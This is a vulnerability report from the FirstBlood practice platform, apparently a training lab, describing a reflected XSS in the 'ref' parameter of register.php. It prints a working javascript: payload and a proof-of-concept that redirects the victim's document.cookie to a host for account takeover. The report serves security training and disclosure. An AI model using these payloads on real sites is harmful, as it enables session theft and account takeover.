FirstBlood-#153Reflected XSS on register.php
This issue was discovered on FirstBlood v1

On 2021-05-10, 0xblackbird Level 5 reported:

Hello! I found a reflected xss on /register.php. It allowed me to execute javascript on the victims behalf whenever he/she clicks on Return to previous page. I was able to escalate this to account takeover and by stealing the cookies.

Steps to reproduce

  • Visit /register.php?ref=javascript:alert(document.domain) and click on Return to previous page.
  • The xss will fire and you'll see an alert box with the document domain.
  • Now to prove the account takeover, I made a little proof of concept: /register.php?ref=javascript:window.location.href=%60http://localhost/${document.cookie}%60. This little javascript PoC will redirect us to http://localhost/{cookies}. From there, the attacker can read the cookie in the server logs and takeover the victim's account with 1 click.


I was able to execute javascript on victims behalf and by that takeover his or her account completely.


Thanks for your methodology, I got the idea from there that parameters get re-used. I came accross that parameter on /drpanel/logout.php and re-used it here. And to my surprise, I found out that the value reflects back in the href html tag.

Thanks! Have a nice day!

Kind regards, 0xblackbird

P3 Medium

Endpoint: /register.php

Parameter: ref

Payload: javascript:alert(document.domain)

FirstBlood ID: 16
Vulnerability Type: Reflective XSS

The parameter "ref" is vulnerable to XSS on register.php. The developers failed to filter javascript: when used on "return to previous page"

Report Feedback


Creator & Administrator

Nice find!